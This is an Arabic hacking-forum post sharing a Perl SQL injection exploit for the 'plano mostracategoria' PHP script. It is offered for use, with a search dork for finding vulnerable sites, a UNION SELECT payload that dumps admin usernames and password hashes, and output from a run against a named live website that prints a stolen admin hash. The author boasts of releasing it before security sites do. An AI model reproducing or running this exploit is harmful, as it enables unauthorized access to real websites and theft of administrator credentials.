KaLa$nikoV | 09-13-2010 11:27 PM | ثغره بسيطه بسكربت استضافه plano mostracategoria (id) Remote SQL Injection Vulnerability كود PHP:
#!/usr/bin/perl -w # plano mostracategoria (id) Remote SQL Injection Vulnerability # Author : kalashnikov # Site : http://kalashnikov-team.com + http://vbspiders.com # Group : KaLa$nikoV t34m # Date : {13-9-2010} # Software : plano_mostracategoria # Greetz : Madjix,ViRuS_HaCkErS,his0k4,el$b7 elmr7,sec4ever,red virus,hassan81,claw,RiSkY,data$hack,Cr3W-Dz,Antivirus7,El3ctr0-dz # team : VoLc4n0 --=-- stone love --=-- fla$h print "|----------------------------------------------------|\n"; print "| plano mostracategoria Remote SQL Injector' |\n"; print "| Coded by : kalashnikov |\n"; print "| Dork : inurl:plano_mostracategoria |\n"; print "| |\n"; print "| admin cp : /login.php or /vadmin |\n"; print "| kalashnikov team |\n"; print "|----------------------------------------------------|\n"; use LWP::UserAgent; print "\nMasukin Target:***91;http://wwww.target.com/path/***93;: "; chomp(my $target=<STDIN>); #Nama Column $concatenation="concat(uname,char(58),passwd)volc4n0"; #Nama Table $table="authuser"; $injection="-7+union+select+"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target . "plano_index.php?paginas=plano_mostracategoria&cat_id=".$injection."+".$concatenation.",1,2,3,4,5,6,7+from/**/".$table."+--+"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~/(***91;0-9a-fA-F***93;{32})/){ print "\n***91;+***93; Admin Hash : $1\n"; print "***91;+***93; Success !! Check target for details...\n"; print "\n"; print "Attention:\n"; print "VoLc4n0 palestine hacker\n"; print " !!\n"; print "\n"; } else{print "\n***91;-***93; wah gagal bro (Belom Cebok tangan lo)...\n"; print "\n"; print "\n"; print "localhost/plano_index.php?paginas=plano_mostracategoria&cat_id=-7+union+select+@@version,2,3,4,5,6,7,8--\n"; }
لسا الليله بنزل الثغره بمواقع السكيورتي
يالله توصلكم قبل الكل :D
وهي تطبيق ع احد المواقع كود:
root@bt:~# perl sql.pl
Possible unintended interpolation of @version in string at sql.pl line 42.
Name "main::version" used only once: possible typo at sql.pl line 42.
|----------------------------------------------------|
| plano mostracategoria Remote SQL Injector' |
| Coded by : kalashnikov |
| Dork : inurl:plano_mostracategoria |
| |
| admin cp : /login.php or /vadmin |
| kalashnikov team |
|----------------------------------------------------|
Masukin Target:[http://wwww.target.com/path/]: http://www.dkweb.com.br/
[+] Admin Hash : d9e64fe43692c1449a70e4b57770cc4d
[+] Success !! Check target for details...
Attention:
VoLc4n0 palestine hacker
!!
root@bt:~#
موفقين
smilies11
هي رابط الثغره لسبب عطل بالكود اعلاه (تشفير اكواد من المنتدى ) http://inj3ct0r.com/exploits/14078 |